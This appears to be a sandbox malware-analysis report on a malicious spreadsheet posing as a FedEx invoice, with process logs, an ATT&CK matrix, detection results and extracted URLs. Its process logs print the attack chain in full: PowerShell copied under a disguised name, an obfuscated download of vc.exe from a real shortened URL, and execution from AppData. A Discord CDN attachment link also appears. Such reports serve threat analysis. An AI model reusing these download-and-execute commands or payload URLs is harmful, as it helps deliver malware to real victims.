Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,

Source: C:\Users\user\AppData\Local\Temp\o.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\AppData\Local\Temp\o.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Robocopy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Robocopy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Users\user\AppData\Roaming\vc.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Robocopy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Robocopy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\o.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\vc.exe	Queries volume information: C:\Users\user\AppData\Roaming\vc.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8C9A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8C9A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8B66C GetVersionExW,GetVersionExW,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8B66C GetVersionExW,GetVersionExW,

Source: C:\Users\user\AppData\Roaming\vc.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\vc.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB89264 SetErrorMode,CorBindToRuntimeEx,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,#30,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysAllocString,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB89264 SetErrorMode,CorBindToRuntimeEx,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,#30,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysAllocString,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,VariantClear,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,??_V@YAXPEAX@Z,??3@YAXPEAX@Z,SysFreeString,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Command and Scripting Interpreter11	Path Interception	Process Injection11	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting11	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Security Software Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection11	NTDS	Virtualization/Sandbox Evasion3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information11	LSA Secrets	Process Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting11	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	File and Directory Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing2	Proc Filesystem	System Information Discovery35	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1099008FEDEX_090887766.xls	15%	ReversingLabs	Document-Word.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\powershell.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\powershell.exe	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	URL Reputation	safe
http://www.a-cert.at0E	0%	Avira URL Cloud	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.e-me.lv/repository0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://www.acabogacia.org/doc0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	0%	Avira URL Cloud	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0	0%	Avira URL Cloud	safe
http://www.certifikat.dk/repository0	0%	Avira URL Cloud	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy0	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	URL Reputation	safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0	0%	Avira URL Cloud	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl0	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl0	0%	URL Reputation	safe
http://repository.infonotary.com/cps/qcps.html0$	0%	Avira URL Cloud	safe
http://www.post.trust.ie/reposit/cps.html0	0%	Avira URL Cloud	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	URL Reputation	safe
http://ocsp.infonotary.com/responder.cgi0V	0%	Avira URL Cloud	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://www.sk.ee/cps/0	0%	URL Reputation	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.globaltrust.info0=	0%	Avira URL Cloud	safe
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://www.valicert.1	0%	Avira URL Cloud	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://www.ssc.lt/cps03	0%	URL Reputation	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=	0%	Avira URL Cloud	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://ocsp.pki.gva.es0	0%	URL Reputation	safe
http://crl.oces.certifikat.dk/oces.crl0	0%	Avira URL Cloud	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	URL Reputation	safe
http://ocsp.comodoca4.com0	0%	URL Reputation	safe
http://ocsp.comodoca4.com0	0%	URL Reputation	safe
http://ocsp.comodoca4.com0	0%	URL Reputation	safe
http://www.dnie.es/dpc0	0%	URL Reputation	safe
http://www.dnie.es/dpc0	0%	URL Reputation	safe
http://www.dnie.es/dpc0	0%	URL Reputation	safe
http://www.rootca.or.kr/rca/cps.html0	0%	Avira URL Cloud	safe
http://www.trustcenter.de/guidelines0	0%	Avira URL Cloud	safe
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
http://www.globaltrust.info0	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://www.disig.sk/ca0f	0%	URL Reputation	safe
http://www.disig.sk/ca0f	0%	URL Reputation	safe
http://www.disig.sk/ca0f	0%	URL Reputation	safe
http://www.sk.ee/juur/crl/0	0%	URL Reputation	safe
http://www.sk.ee/juur/crl/0	0%	URL Reputation	safe
http://www.sk.ee/juur/crl/0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tinyurl.com	104.20.138.65	true	false		high
cdn.discordapp.com	162.159.134.233	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://tinyurl.com/y3m5fwhq	o.exe, 00000010.00000002.2137406124.000000000351E000.00000004.00000001.sdmp	false		high
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.a-cert.at0E	o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.e-me.lv/repository0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.acabogacia.org/doc0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.chambersign.org/chambersroot.crl0	o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0	o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iis.fhg.de/audioPA	Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0	o.exe, 00000010.00000003.2131439374.000000001D153000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certifikat.dk/repository0	o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chambersign.org1	o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://repository.swisssign.com/0	o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	false		high
http://treyresearch.net	Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-c/cacrl.crl0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0	o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0	o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certplus.com/CRL/class3P.crl0	o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://repository.infonotary.com/cps/qcps.html0$	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.post.trust.ie/reposit/cps.html0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp, o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.disig.sk/ca/crl/ca_disig.crl0	o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/770629131393x	o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	false		high
http://ocsp.infonotary.com/responder.cgi0V	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sk.ee/cps/0	o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://computername/printers/printername/.printer	Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.globaltrust.info0=	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E	o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://servername/isapibackend.dll	o.exe, 00000010.00000002.2141573754.000000001D2B0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.valicert.1	o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.ssc.lt/cps03	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.windows.com/pctv.	o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	false		high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=	o.exe, 00000010.00000003.2131439374.000000001D153000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.pki.gva.es0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.oces.certifikat.dk/oces.crl0	o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ssc.lt/root-b/cacrl.crl0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.certicamara.com/dpc/0Z	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false		high
http://crl.pki.wellsfargo.com/wsprca.crl0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false		high
http://ocsp.comodoca4.com0	o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.dnie.es/dpc0	o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.rootca.or.kr/rca/cps.html0	o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.discordapp.com/attachments/770629131393	o.exe, 00000010.00000002.2137518036.000000000361C000.00000004.00000001.sdmp	false		high
http://www.trustcenter.de/guidelines0	o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.globaltrust.info0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://certificates.starfieldtech.com/repository/1604	o.exe, 00000010.00000002.2141086169.000000001D0C7000.00000004.00000001.sdmp	false		high
http://www.entrust.net/CRL/Client1.crl0	o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	Robocopy.exe, 00000007.00000002.2110204380.0000000002A40000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2133317799.0000000002530000.00000002.00000001.sdmp	false		high
https://www.catcert.net/verarrel	o.exe, 00000010.00000003.2131231546.000000001D12F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.disig.sk/ca0f	o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	false		high
http://www.e-szigno.hu/RootCA.crl	o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	false		high
http://www.signatur.rtr.at/current.crl0	o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	false		high
http://www.sk.ee/juur/crl/0	o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.chambersign.org/chambersignroot.crl0	o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.quovadis.bm0	o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.ssc.lt/root-a/cacrl.crl0	o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.trustdst.com/certificates/policy/ACES-index.html0	o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.firmaprofesional.com0	o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.netlock.net/docs	o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl	o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	false		high
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0	o.exe, 00000010.00000002.2141086169.000000001D0C7000.00000004.00000001.sdmp	false		high
http://cps.chambersign.org/cps/publicnotaryroot.html0	o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
